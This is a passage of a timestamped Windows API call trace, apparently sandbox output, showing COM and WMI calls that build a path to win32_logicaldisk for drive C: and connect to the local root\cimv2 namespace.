(in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6bce958, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0148.069] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bceea0 | out: ppv=0x6bceea0*=0x72015c) returned 0x0 [0148.070] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bcee98 | out: pAptType=0x6bcee98*=1) returned 0x0 [0148.070] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bcee9c | out: ppvObject=0x6bcee9c*=0x0) returned 0x80004002 [0148.070] IUnknown:Release (This=0x72015c) returned 0x1 [0148.071] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce808 | out: ppv=0x6bce808*=0x6736ec8) returned 0x0 [0148.072] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bcea20 | out: ppvObject=0x6bcea20*=0x0) returned 0x80004002 [0148.072] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736ec8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcea34 | out: ppvObject=0x6bcea34*=0x6738460) returned 0x0 [0148.072] WbemDefPath:IUnknown:Release (This=0x6736ec8) returned 0x0 [0148.072] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce654 | out: ppvObject=0x6bce654*=0x6738460) returned 0x0 [0148.072] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce610 | out: ppvObject=0x6bce610*=0x0) returned 0x80004002 [0148.072] WbemDefPath:IUnknown:AddRef (This=0x6738460) returned 0x3 [0148.072] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bcdf6c | out: ppvObject=0x6bcdf6c*=0x0) returned 0x80004002 [0148.072] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcdf1c | out: ppvObject=0x6bcdf1c*=0x0) returned 0x80004002 [0148.072] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcdf28 | out: ppvObject=0x6bcdf28*=0x7ae440) returned 0x0 [0148.072] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae440, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcdf30 | out: pCid=0x6bcdf30*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.073] WbemDefPath:IUnknown:Release (This=0x7ae440) returned 0x3 [0148.073] CoGetContextToken (in: pToken=0x6bcdf88 | out: pToken=0x6bcdf88) returned 0x0 [0148.073] CoGetContextToken (in: pToken=0x6bce390 | out: pToken=0x6bce390) returned 0x0 [0148.073] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce420 | out: ppvObject=0x6bce420*=0x0) returned 0x80004002 [0148.073] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x2 [0148.073] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x1 [0148.073] CoGetContextToken (in: pToken=0x6bced18 | out: pToken=0x6bced18) returned 0x0 [0148.073] CoGetContextToken (in: pToken=0x6bcec78 | out: pToken=0x6bcec78) returned 0x0 [0148.073] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x6bced48*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6bced44 | out: ppvObject=0x6bced44*=0x6738460) returned 0x0 [0148.074] WbemDefPath:IUnknown:AddRef (This=0x6738460) returned 0x3 [0148.074] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x2 [0148.074] WbemDefPath:IWbemPath:SetText (This=0x6738460, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.074] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738460, puCount=0x6bceecc | out: puCount=0x6bceecc*=0x0) returned 0x0 [0148.074] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x6bceec8*=0x0, pszText=0x0 | out: puBuffLength=0x6bceec8*=0x20, pszText=0x0) returned 0x0 [0148.074] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x6bceec8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bceec8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.074] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738460, uRequestedInfo=0x0, puResponse=0x6bceed4 | out: puResponse=0x6bceed4*=0xc19) returned 0x0 [0148.074] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738460, puCount=0x6bceecc | out: puCount=0x6bceecc*=0x0) returned 0x0 [0148.074] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738460, uRequestedInfo=0x0, puResponse=0x6bceed4 | out: puResponse=0x6bceed4*=0xc19) returned 0x0 [0148.074] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738460, uRequestedInfo=0x0, puResponse=0x6bceed4 | out: puResponse=0x6bceed4*=0xc19) returned 0x0 [0148.074] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738460, puCount=0x6bcee4c | out: puCount=0x6bcee4c*=0x0) returned 0x0 [0148.074] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6bcee38 | out: puCount=0x6bcee38*=0x2) returned 0x0 [0148.074] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6bcee34*=0x0, pszText=0x0 | out: puBuffLength=0x6bcee34*=0xf, pszText=0x0) returned 0x0 [0148.074] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6bcee34*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bcee34*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.074] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bcede8 | out: ppv=0x6bcede8*=0x72015c) returned 0x0 [0148.074] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bcede0 | out: pAptType=0x6bcede0*=1) returned 0x0 [0148.074] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bcede4 | out: ppvObject=0x6bcede4*=0x0) returned 0x80004002 [0148.075] IUnknown:Release (This=0x72015c) returned 0x1 [0148.075] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce750 | out: ppv=0x6bce750*=0x6736e88) returned 0x0 [0148.076] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e88, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce968 | out: ppvObject=0x6bce968*=0x0) returned 0x80004002 [0148.076] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e88, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce97c | out: ppvObject=0x6bce97c*=0x67383f0) returned 0x0 [0148.076] WbemDefPath:IUnknown:Release (This=0x6736e88) returned 0x0 [0148.076] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce59c | out: ppvObject=0x6bce59c*=0x67383f0) returned 0x0 [0148.076] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce558 | out: ppvObject=0x6bce558*=0x0) returned 0x80004002 [0148.076] WbemDefPath:IUnknown:AddRef (This=0x67383f0) returned 0x3 [0148.076] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bcdeb4 | out: ppvObject=0x6bcdeb4*=0x0) returned 0x80004002 [0148.076] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcde64 | out: ppvObject=0x6bcde64*=0x0) returned 0x80004002 [0148.076] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcde70 | out: ppvObject=0x6bcde70*=0x7ae6c0) returned 0x0 [0148.076] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae6c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcde78 | out: pCid=0x6bcde78*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.076] WbemDefPath:IUnknown:Release (This=0x7ae6c0) returned 0x3 [0148.076] CoGetContextToken (in: pToken=0x6bcded0 | out: pToken=0x6bcded0) returned 0x0 [0148.076] CoGetContextToken (in: pToken=0x6bce2d8 | out: pToken=0x6bce2d8) returned 0x0 [0148.076] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce368 | out: ppvObject=0x6bce368*=0x0) returned 0x80004002 [0148.077] WbemDefPath:IUnknown:Release (This=0x67383f0) returned 0x2 [0148.077] WbemDefPath:IUnknown:Release (This=0x67383f0) returned 0x1 [0148.077] CoGetContextToken (in: pToken=0x6bcec60 | out: pToken=0x6bcec60) returned 0x0 [0148.077] CoGetContextToken (in: pToken=0x6bcebc0 | out: pToken=0x6bcebc0) returned 0x0 [0148.077] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x6bcec90*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6bcec8c | out: ppvObject=0x6bcec8c*=0x67383f0) returned 0x0 [0148.077] WbemDefPath:IUnknown:AddRef (This=0x67383f0) returned 0x3 [0148.077] WbemDefPath:IUnknown:Release (This=0x67383f0) returned 0x2 [0148.077] WbemDefPath:IWbemPath:SetText (This=0x67383f0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0148.077] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67383f0, puCount=0x6bcee10 | out: puCount=0x6bcee10*=0x2) returned 0x0 [0148.077] WbemDefPath:IWbemPath:GetText (in: This=0x67383f0, lFlags=4, puBuffLength=0x6bcee0c*=0x0, pszText=0x0 | out: puBuffLength=0x6bcee0c*=0xf, pszText=0x0) returned 0x0 [0148.077] WbemDefPath:IWbemPath:GetText (in: This=0x67383f0, lFlags=4, puBuffLength=0x6bcee0c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bcee0c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.077] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bcee10 | out: ppv=0x6bcee10*=0x72015c) returned 0x0 [0148.077] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bcee08 | out: pAptType=0x6bcee08*=1) returned 0x0 [0148.077] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bcee0c | out: ppvObject=0x6bcee0c*=0x0) returned 0x80004002 [0148.077] IUnknown:Release (This=0x72015c) returned 0x1 [0148.078] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bcea30 | out: ppv=0x6bcea30*=0x672f478) returned 0x0 [0148.078] WbemLocator:IUnknown:QueryInterface (in: This=0x672f478, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bcec48 | out: ppvObject=0x6bcec48*=0x0) returned 0x80004002 [0148.078] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f478, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcec5c | out: ppvObject=0x6bcec5c*=0x6736e78) returned 0x0 [0148.078] WbemLocator:IUnknown:Release (This=0x672f478) returned 0x0 [0148.078] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e78, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce87c | out: ppvObject=0x6bce87c*=0x6736e78) returned 0x0 [0148.078] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e78, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce838 | out: ppvObject=0x6bce838*=0x0) returned 0x80004002 [0148.079] WbemLocator:IUnknown:AddRef (This=0x6736e78) returned 0x3 [0148.079] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e78, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bce194 | out: ppvObject=0x6bce194*=0x0) returned 0x80004002 [0148.079] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e78, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bce144 | out: ppvObject=0x6bce144*=0x0) returned 0x80004002 [0148.079] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e78, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce150 | out: ppvObject=0x6bce150*=0x0) returned 0x80004002 [0148.079] CoGetContextToken (in: pToken=0x6bce1b0 | out: pToken=0x6bce1b0) returned 0x0 [0148.079] CoGetContextToken (in: pToken=0x6bce5b8 | out: pToken=0x6bce5b8) returned 0x0 [0148.079] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e78, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce648 | out: ppvObject=0x6bce648*=0x0) returned 0x80004002 [0148.079] WbemLocator:IUnknown:Release (This=0x6736e78) returned 0x2 [0148.079] WbemLocator:IUnknown:Release (This=0x6736e78) returned 0x1 [0148.079] CoGetContextToken (in: pToken=0x6bcec28 | out: pToken=0x6bcec28) returned 0x0 [0148.079] CoGetContextToken (in: pToken=0x6bceb88 | out: pToken=0x6bceb88) returned 0x0 [0148.079] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e78, riid=0x6bcec58*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6bcec54 | out: ppvObject=0x6bcec54*=0x6736e78) returned 0x0 [0148.079] WbemLocator:IUnknown:AddRef (This=0x6736e78) returned 0x3 [0148.079] WbemLocator:IUnknown:Release (This=0x6736e78) returned 0x2 [0148.079] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67383f0, puCount=0x6bcedec | out: puCount=0x6bcedec*=0x2) returned 0x0 [0148.079] WbemDefPath:IWbemPath:GetText (in: This=0x67383f0, lFlags=8, puBuffLength=0x6bcede8*=0x0, pszText=0x0 | out: puBuffLength=0x6bcede8*=0xf, pszText=0x0) returned 0x0 [0148.079] WbemDefPath:IWbemPath:GetText (in: This=0x67383f0, lFlags=8, puBuffLength=0x6bcede8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bcede8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.079] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6bcecc4 | out: ppv=0x6bcecc4*=0x6736e68) returned 0x0 [0148.079] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736e68, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6bced58 | out: ppNamespace=0x6bced58*=0x672ccec) returned 0x0 [0148.590] WbemLocator:IUnknown:QueryInterface (in: This=0x672ccec, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcebf4 | out: ppvObject=0x6bcebf4*=0x781094) returned 0x0 [0148.590] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781094, pProxy=0x672ccec, pAuthnSvc=0x6bcec44, pAuthzSvc=0x6bcec40, pServerPrincName=0x6bcec38, pAuthnLevel=0x6bcec3c, pImpLevel=0x6bcec2c, pAuthInfo=0x6bcec30, pCapabilites=0x6bcec34 | out: pAuthnSvc=0x6bcec44*=0xa, pAuthzSvc=0x6bcec40*=0x0, pServerPrincName=0x6bcec38, pAuthnLevel=0x6bcec3c*=0x6, pImpLevel=0x6bcec2c*=0x2, pAuthInfo=0x6bcec30, pCapabilites=0x6bcec34*=0x1) returned 0x0 [0148.590] WbemLocator:IUnknown:Release (This=0x781094) returned 0x1 [0148.590] WbemLocator:IUnknown:QueryInterface (in: This=0x672ccec, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcebe8 | out: ppvObject=0x6bcebe8*=0x7810b4) returned 0x0 [0148.590] WbemLocator:IUnknown:QueryInterface (in: This=0x672ccec, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcebe4 | out: ppvObject=0x6bcebe4*=0x781094) returned 0x0 [0148.590] WbemLocator:IClientSecurity:SetBlanket (This=0x781094, pProxy=0x672ccec, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0148.591] WbemLocator:IUnknown:Release (This=0x781094) returned 0x2 [0148.591] WbemLocator:IUnknown:Release (This=0x7810b4) returned 0x1 [0148.591] CoTaskMemFree (pv=0x77e058) [0148.591] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x0 [0148.591] WbemLocator:IUnknown:QueryInterface (in: This=0x672ccec, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce7e4 | out: ppvObject=0x6bce7e4*=0x7810b4) returned 0x0 [0148.591] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce7a0 | out: ppvObject=0x6bce7a0*=0x0) returned 0x80004002 [0148.592] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce5bc | out: ppvObject=0x6bce5bc*=0x0) returned 0x80004002 [0148.592] WbemLocator:IUnknown:AddRef (This=0x7810b4) returned 0x3 [0148.592] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bce0fc | out: ppvObject=0x6bce0fc*=0x0) returned 0x80004002 [0148.593] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bce0ac | out: ppvObject=0x6bce0ac*=0x0) returned 0x80004002 [0148.593] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce0b8 | out: ppvObject=0x6bce0b8*=0x781014) returned 0x0 [0148.593] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781014, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bce0c0 | out: pCid=0x6bce0c0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.593] WbemLocator:IUnknown:Release (This=0x781014) returned 0x3 [0148.593] CoGetContextToken (in: pToken=0x6bce118 | out: pToken=0x6bce118) returned 0x0 [0148.593] CoGetContextToken (in: pToken=0x6bce520 | out: pToken=0x6bce520) returned 0x0 [0148.593] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, 